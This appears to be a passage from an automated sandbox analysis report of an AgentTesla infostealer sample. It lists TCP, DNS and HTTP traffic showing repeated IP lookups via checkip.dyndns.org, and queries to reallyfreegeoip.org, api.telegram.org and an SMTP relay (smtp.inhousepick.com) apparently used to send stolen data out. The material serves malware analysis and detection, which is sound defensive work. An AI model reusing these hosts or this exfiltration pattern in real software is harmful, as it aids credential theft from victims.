Oct 22, 2024 15:42:45.671437025 CEST	49867	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:45.676863909 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:45.676951885 CEST	49867	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:45.806045055 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:45.809483051 CEST	49847	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:45.815299034 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:45.815366983 CEST	49847	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:46.257414103 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:46.259242058 CEST	49867	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:46.264631033 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:46.417192936 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:46.417488098 CEST	49867	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:46.422892094 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:50.578232050 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:50.578474045 CEST	49867	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:50.583942890 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:52.469640970 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:52.517324924 CEST	49867	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:52.536221981 CEST	49867	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:52.541531086 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:52.697421074 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:52.697593927 CEST	49867	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:52.702958107 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:52.876966000 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:52.879560947 CEST	49867	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:52.885468006 CEST	587	49867	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:52.885554075 CEST	49867	587	192.168.2.6	208.91.199.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 22, 2024 15:42:19.141088009 CEST	60626	53	192.168.2.6	1.1.1.1
Oct 22, 2024 15:42:19.149838924 CEST	53	60626	1.1.1.1	192.168.2.6
Oct 22, 2024 15:42:20.486788988 CEST	59217	53	192.168.2.6	1.1.1.1
Oct 22, 2024 15:42:20.494952917 CEST	53	59217	1.1.1.1	192.168.2.6
Oct 22, 2024 15:42:35.996190071 CEST	54633	53	192.168.2.6	1.1.1.1
Oct 22, 2024 15:42:36.004393101 CEST	53	54633	1.1.1.1	192.168.2.6
Oct 22, 2024 15:42:42.343189955 CEST	65158	53	192.168.2.6	1.1.1.1
Oct 22, 2024 15:42:42.629044056 CEST	53	65158	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 22, 2024 15:42:19.141088009 CEST	192.168.2.6	1.1.1.1	0xcf81	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:20.486788988 CEST	192.168.2.6	1.1.1.1	0x6d61	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:35.996190071 CEST	192.168.2.6	1.1.1.1	0xa5ef	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:42.343189955 CEST	192.168.2.6	1.1.1.1	0x7ffb	Standard query (0)	smtp.inhousepick.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 22, 2024 15:42:19.149838924 CEST	1.1.1.1	192.168.2.6	0xcf81	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 22, 2024 15:42:19.149838924 CEST	1.1.1.1	192.168.2.6	0xcf81	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:19.149838924 CEST	1.1.1.1	192.168.2.6	0xcf81	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:19.149838924 CEST	1.1.1.1	192.168.2.6	0xcf81	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:19.149838924 CEST	1.1.1.1	192.168.2.6	0xcf81	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:19.149838924 CEST	1.1.1.1	192.168.2.6	0xcf81	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:20.494952917 CEST	1.1.1.1	192.168.2.6	0x6d61	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:20.494952917 CEST	1.1.1.1	192.168.2.6	0x6d61	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:36.004393101 CEST	1.1.1.1	192.168.2.6	0xa5ef	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:42.629044056 CEST	1.1.1.1	192.168.2.6	0x7ffb	No error (0)	smtp.inhousepick.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 22, 2024 15:42:42.629044056 CEST	1.1.1.1	192.168.2.6	0x7ffb	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:42.629044056 CEST	1.1.1.1	192.168.2.6	0x7ffb	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:42.629044056 CEST	1.1.1.1	192.168.2.6	0x7ffb	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Oct 22, 2024 15:42:42.629044056 CEST	1.1.1.1	192.168.2.6	0x7ffb	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	132.226.247.73	80	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:19.161592960 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:20.103437901 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:19 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f0f6b0be73dfa7dcf99f33df53edd77b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:20.108005047 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 22, 2024 15:42:20.372724056 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 18f130e9609a66820b1de0ff3c287e91 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:21.514704943 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 22, 2024 15:42:21.774007082 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 55fb46cfc3f6a537eb427ece90507a39 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49718	132.226.247.73	80	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:22.533277035 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 22, 2024 15:42:23.412312984 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 350e0f088e64c28f9d4d8be2d231c9b9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49721	132.226.247.73	80	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:23.357048035 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:24.472954988 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9b26840f740de01f6d98fe49c2882535 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:24.474092007 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9b26840f740de01f6d98fe49c2882535 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:24.477407932 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 22, 2024 15:42:24.736464977 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fe771d14bd8f70e61dcec0150b27d69d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:25.620951891 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 22, 2024 15:42:25.878968000 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 258f98b43fcb682e96f417c75ce99283 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49723	132.226.247.73	80	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:24.628892899 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:25.494057894 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 01146526528d68b602fa052c8976e320 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49737	132.226.247.73	80	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:26.275635004 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:27.158302069 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0c8d3920417cf1e1807363089a919310 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49742	132.226.247.73	80	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:26.801947117 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 22, 2024 15:42:27.676618099 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1debbfc98b561c67b8c04e6eddd90ec8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49751	132.226.247.73	80	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:27.921530008 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:28.916229010 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1ef5dbfd9fe8cf1152876ecf41daee5a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49752	132.226.247.73	80	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:28.498122931 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:29.385700941 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 30532f61d921313e027352df55035809 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49761	132.226.247.73	80	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:29.683696032 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:30.686779976 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:30 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c67da5fb4c6d1d579cb4e82e44b33840 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49767	132.226.247.73	80	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:30.161077976 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:31.014646053 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:30 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d85751a64a89560f0eb44b97b6a0c947 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49775	132.226.247.73	80	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:31.483508110 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:32.676529884 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5061e672a27e8ba10ae575b5d5031fe1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:32.676919937 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5061e672a27e8ba10ae575b5d5031fe1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49778	132.226.247.73	80	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:31.776201010 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:32.677066088 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7e91664bf0468c27d9d0b7f5a9994b4e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49790	132.226.247.73	80	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
